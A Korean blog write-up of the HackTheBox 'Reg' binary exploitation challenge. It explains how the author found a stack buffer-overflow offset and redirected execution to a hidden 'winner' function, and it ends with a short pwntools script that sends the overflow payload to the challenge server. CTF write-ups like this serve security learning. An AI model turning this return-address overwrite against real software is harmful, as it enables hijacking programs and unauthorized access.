-Reg- HackTheBox

2023. 3. 5. 16:57Pwnable/HackTheBox_ Intro to Binary Exploitation

 

 

해당문제는 HackTheBox Intro to Binary Exploitation 트랙 문제입니다.

 

문제의 소스코드는 주어지지 않았다.

 

실행하면 입력을 하나 딸랑 받고 끝이다..

 

즉 버퍼오버플로우를 일으키면 되지 않을까 생각했다.

 

우선 GDB를 통해 파일을 까 봤다.

 

 

메인함수에서는 RUN 함수를 불러 실행시킨다.

해당 RUN 함수에서 입력을 받는 거 같다.

 

rbp -0x30와 다른정보들로 offset 을 구할 수 있지만 필자는 패턴을 생성하여 offset 을 구했다.

##Canary 안 걸려 있으면 이게 짱이다 짱

 

손쉽게 오프셋을 구했다.

 

이후 Cat flag 코드가 삼입 되어 있는 부분을 찾아야 했다.

 

 

딱 봐도 winner 함수에서 플래그를 찾을 수 있을 거 같이 생겼다.

 

우선 IDA를 통해 Decompile 해보면 다음과 같이 나온다.

하지만 main함수와 run 함수에서 winner 함수 함수를 실행시키지 않기 때문에 버퍼오버플로우를 일으킨 이후 RET Address 를 해당 함수의 시작 주소로 덮으면 될 거 같았다.

 

그렇게 작성한 페이로드는 다음과 같다.

 

from pwn import *

p = remote("161.35.33.20",32275)

offset = 56

winner_addr = p64(0x0000000000401206)
payload = b'A' * offset + winner_addr
p.sendline(payload)


result = p.recv(1000)

print(result)

야호 오늘도 성공이다 !

'Pwnable > HackTheBox_ Intro to Binary Exploitation' 카테고리의 다른 글

batcomputer -2- HackTheBox  (0) 2023.02.25
Jeeves - 1 - (HackTheBox)  (0) 2023.02.24